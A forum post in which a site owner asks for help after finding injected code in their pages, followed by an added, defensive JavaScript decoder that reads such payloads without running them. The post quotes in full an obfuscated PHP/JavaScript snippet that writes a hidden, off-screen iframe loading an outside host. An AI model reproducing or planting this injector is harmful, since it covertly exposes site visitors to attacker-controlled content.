Hello,
as the title says, I have a big problem with a site and XSS (Cross-site scripting) holes; the problem is that I can't figure out where the hole is.
From what I've seen, it seems to me that the way in is through the includes I use for the site's menu and footer (which I have removed for now).
I also have a login form for the administration page used to upload files.
Now here is what I find in the various pages:

<? php echo '<script type="text/javascript">var XiLgdMoRSAbuUBAgpMkf = "uKNMv60uKNMv105uKNMv102uKNMv114uKNMv97uKNMv10 9uKN Mv101uKNMv32uKNMv119uKNMv105uKNMv100uKNMv116uKNMv1 04uKNMv61uKNMv34uKNMv52uKNMv56uKNMv48uKNMv34uKNMv3 2uKNMv104uKNMv101uKNMv105uKNMv103uKNMv104uKNMv116u KNMv61uKNMv34uKNMv54uKNMv48uKNMv34uKNMv32uKNMv115u KNMv114uKNMv99uKNMv61uKNMv34uKNMv104uKNMv116uKNMv1 16uKNMv112uKNMv58uKNMv47uKNMv47uKNMv120uKNMv98uKNM v120uKNMv46uKNMv116uKNMv119uKNMv47uKNMv105uKNMv110 uKNMv46uKNMv99uKNMv103uKNMv105uKNMv63uKNMv51uKNMv3 4uKNMv32uKNMv115uKNMv116uKNMv121uKNMv108uKNMv101uK NMv61uKNMv34uKNMv98uKNMv111uKNMv114uKNMv100uKNMv10 1uKNMv114uKNMv58uKNMv48uKNMv112uKNMv120uKNMv59uKNM v32uKNMv112uKNMv111uKNMv115uKNMv105uKNMv116uKNMv10 5uKNMv111uKNMv110uKNMv58uKNMv114uKNMv101uKNMv108uK NMv97uKNMv116uKNMv105uKNMv118uKNMv101uKNMv59uKNMv3 2uKNMv116uKNMv111uKNMv112uKNMv58uKNMv48uKNMv112uKN Mv120uKNMv59uKNMv32uKNMv108uKNMv101uKNMv102uKNMv11 6uKNMv58uKNMv45uKNMv53uKNMv48uKNMv48uKNMv112uKNMv1 20uKNMv59uKNMv32uKNMv111uKNMv112uKNMv97uKNMv99uKNM v105uKNMv116uKNMv121uKNMv58uKNMv48uKNMv59uKNMv32uK NMv102uKNMv105uKNMv108uKNMv116uKNMv101uKNMv114uKNM v58uKNMv112uKNMv114uKNMv111uKNMv103uKNMv105uKNMv10 0uKNMv58uKNMv68uKNMv88uKNMv73uKNMv109uKNMv97uKNMv1 03uKNMv101uKNMv84uKNMv114uKNMv97uKNMv110uKNMv115uK NMv102uKNMv111uKNMv114uKNMv109uKNMv46uKNMv77uKNMv1 05uKNMv99uKNMv114uKNMv111uKNMv115uKNMv111uKNMv102u KNMv116uKNMv46uKNMv65uKNMv108uKNMv112uKNMv104uKNMv 97uKNMv40uKNMv111uKNMv112uKNMv97uKNMv99uKNMv105uKN Mv116uKNMv121uKNMv61uKNMv48uKNMv41uKNMv59uKNMv32uK NMv45uKNMv109uKNMv111uKNMv122uKNMv45uKNMv111uKNMv1 12uKNMv97uKNMv99uKNMv105uKNMv116uKNMv121uKNMv58uKN Mv48uKNMv34uKNMv62uKNMv60uKNMv47uKNMv105uKNMv102uK NMv114uKNMv97uKNMv109uKNMv101uKNMv62";var ChBcyUOSVHTsqfYTsNlK = XiLgdMoRSAbuUBAgpMkf.split("uKNMv");var ONFiOFOESykVglxfGMyb = "";for (var URUKxtepGQzUdEDsKRwd=1; URUKxtepGQzUdEDsKRwd<ChBcyUOSVHTsqfYTsNlK.length; URUKxtepGQzUdEDsKRwd++){ONFiOFOESykVglxfGMyb+=Stri 
ng.fromCharCode(ChBcyUOSVHTsqfYTsNlK[URUKxtepGQzUdEDsKRwd]);}document.write(ONFiOFOESykVglxfGMyb)</script>'; ? >

I hope you can give me a hand figuring out what to do.
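
Added example, not part of the original post: a static decoder for the obfuscation pattern in the snippet above (a delimiter-separated list of decimal character codes, rebuilt with `String.fromCharCode` and emitted with `document.write`), so the injected markup can be read without running it. The sample blob, its `zQ` delimiter and the `example.invalid` URL are constructed, and the function names are hypothetical.

```javascript
// Static decoder for the "delimiter + decimal char code" obfuscation shown in the post.
// It only builds a string; nothing is evaluated or written into a page.
function decodeCharCodeBlob(scriptText) {
  const literal = /=\s*"([^"]*)"\s*;/.exec(scriptText);        // the long encoded string
  const split = /\.split\(\s*"([^"]+)"\s*\)/.exec(scriptText); // the delimiter it is split on
  if (!literal || !split) throw new Error("pattern not found");
  // Forum line-wrapping inserts spaces and newlines into the blob; drop them first.
  const blob = literal[1].replace(/\s+/g, "");
  const codes = blob.split(split[1]).filter((p) => p !== "").map(Number);
  if (codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) {
    throw new Error("non-numeric chunk in blob");
  }
  return String.fromCharCode(...codes);
}

// Pull out what an incident responder wants: where it points and whether it is hidden.
function summarize(decoded) {
  const srcs = [...decoded.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi)].map((m) => m[1]);
  const hidden = /opacity\s*:\s*0|left\s*:\s*-\d+px|display\s*:\s*none/i.test(decoded);
  return { iframeSrcs: srcs, hidden };
}

// Constructed sample (not the payload from the post), with wrap-induced spaces left in.
const SAMPLE =
  'var a = "zQ60zQ105zQ102zQ114zQ97zQ109zQ101zQ32zQ115zQ114zQ99zQ61zQ34zQ1 04zQ116' +
  'zQ116zQ112zQ58zQ47zQ47zQ101zQ120zQ97zQ109zQ112zQ108zQ101zQ46zQ105z Q110zQ118' +
  'zQ97zQ108zQ105zQ100zQ47zQ34zQ32zQ115zQ116zQ121zQ108zQ101zQ61zQ34zQ111zQ112' +
  'zQ97zQ99zQ105zQ116zQ121zQ58zQ48zQ34zQ62zQ60zQ47zQ105zQ102zQ114zQ97zQ109zQ101zQ62";' +
  'var b = a.split("zQ");';

console.log(summarize(decodeCharCodeBlob(SAMPLE)));
```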